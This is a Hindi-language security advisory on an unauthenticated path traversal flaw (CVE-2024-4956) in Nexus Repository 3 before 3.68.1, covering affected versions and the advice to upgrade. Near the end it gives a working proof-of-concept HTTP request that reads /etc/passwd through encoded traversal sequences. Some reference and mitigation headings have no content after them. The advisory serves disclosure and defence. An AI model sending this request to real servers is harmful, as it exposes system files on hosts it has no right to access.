
नेक्सस रिपॉजिटरी 3 में अनधिकृत पथ ट्रैवर्सल
Nexus Repository Manager एक रिपॉजिटरी प्रबंधक है जो विकास के लिए आवश्यक आर्टिफैक्ट्स को व्यवस्थित, संग्रहीत और वितरित करता है।
Nexus Repository 3 में, संस्करण 3.68.1 से पहले के संस्करणों में एक पथ ट्रैवर्सल भेद्यता खोजी गई है। यह भेद्यता एक हमलावर को बिना किसी प्रमाणीकरण के Nexus Repository एप्लिकेशन के दायरे से बाहर सिस्टम फ़ाइलों को डाउनलोड करने के लिए URL बनाने की अनुमति देती है। यह एक महत्वपूर्ण जोखिम उत्पन्न करता है क्योंकि यह संवेदनशील सिस्टम फ़ाइलों को उजागर कर सकता है और संभावित रूप से उस वातावरण की सुरक्षा से समझौता कर सकता है जहाँ Nexus Repository स्थापित है।
इस भेद्यता को कम करने के लिए जितनी जल्दी हो सके Nexus Repository को संस्करण 3.68.1 या बाद में अपडेट करने की अनुशंसा की जाती है।
भेद्यता के बारे में अधिक जानकारी और तकनीकी विवरण के लिए, कृपया निम्नलिखित लिंक देखें:
संदर्भ:
यह भेद्यता Sonatype Nexus Repository Manager के संस्करण 3.0 से 3.68.0 को प्रभावित करती है।
Nexus Repository को अपग्रेड करना इस भेद्यता को समाप्त करने के लिए अनुशंसित तरीका है। हालांकि, उन डिप्लॉयमेंट के लिए तत्काल शमन विकल्प उपलब्ध हैं जो तुरंत अपग्रेड नहीं कर सकते:
संदर्भ:
GET /%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Cache-Control: max-age=0
उपरोक्त PoC के साथ, /etc/passwd फ़ाइल तक पहुँचते देखना संभव है:

(CVE-2024-4956.yaml) https://github.com/erickfernandox/CVE-2024-4956/blob/main/CVE-2024-4956.yaml